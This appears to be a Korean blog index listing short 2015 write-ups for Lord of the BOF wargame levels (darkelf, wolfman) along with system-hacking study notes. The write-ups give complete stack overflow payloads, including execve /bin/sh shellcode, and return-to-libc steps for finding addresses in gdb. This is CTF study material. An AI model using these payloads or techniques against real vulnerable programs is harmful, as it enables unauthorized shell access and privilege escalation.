System4

• 

  LOB darklf 소스를 열어보면 일단 전문제랑 비슷한데 길이를 체크한다.첫번째인자 값의 길이를 확인하여 48글자보다 크면 나와버리는 것을 확인 할수 있다. 일단 앞과 똑같이 진행하고 payload를 작성때 ./darkelf $(python -c 'print "\x90"*40+"AAAA"+"\xcc\xfb\xff\xbf"') Wargame/CTF(Capture The Flag) 2015. 9. 15.

• 

  LOB wolfman 다시 문제를 풀면 두둥 전 문제랑 똑같은 패턴이다. ./wolfman $(python -c 'print "\x90"*40+"AAAA(dummy)"+"\xec\xfb\xff\xbf"(주소값)+"\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"') Wargame/CTF(Capture The Flag) 2015. 9. 15.

• system 2 gdb안에서의 blocking 함수 입력 r Security Study/System 2015. 9. 13.

• system 1일차 buf[248] + sfp[4] + ret ulimit -s unlimited //스택크기를 무한정으로 늘려 ASLR이 적용안됨 system,execve - ebp+8위치에있는것을 인자로받음 buf[248] + sfp [4] + 조작(system) + AAAA + /bin/sh - system("/bin/sh") b main r 1 p system - system주소 구하기 p exit - exit구하기 find &system,+9999999,"/bin/sh" - /bin/sh주소 구하기 ./filename $(python -c 'print "A"*버퍼+sfp + system + exit + /bin/sh strcpy(bss,\x80asda) strcpy(bss,"b") ./filename buf+sfp.. Security Study/System 2015. 9. 12.